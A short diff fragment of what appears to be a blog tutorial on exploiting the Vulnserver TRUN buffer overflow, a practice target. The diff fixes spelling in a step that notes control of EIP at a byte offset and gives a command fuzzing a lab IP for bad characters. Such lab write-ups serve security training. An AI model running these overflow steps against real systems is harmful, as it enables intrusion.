mojodojo101/mojo_blog/bofs/vulnserver/trun.md

 We overwrote EIP with 4* 0x44 which corresponds to the bytes 2013-2016 since the last two bytes are our \r\n.

-Now we should check for bad chars by using the -f fuzzbc (Fuzz bad charackters) Fucntion.
+Now we should check for bad chars by using the -f fuzzbc (Fuzz bad characters) function.

 ```bash
 root@kali:~/redteam/vulnserver# python fuzzer.py -f "TRUN ." -l 2018 -i 192.168.138.139 -p 9999 func fuzzbc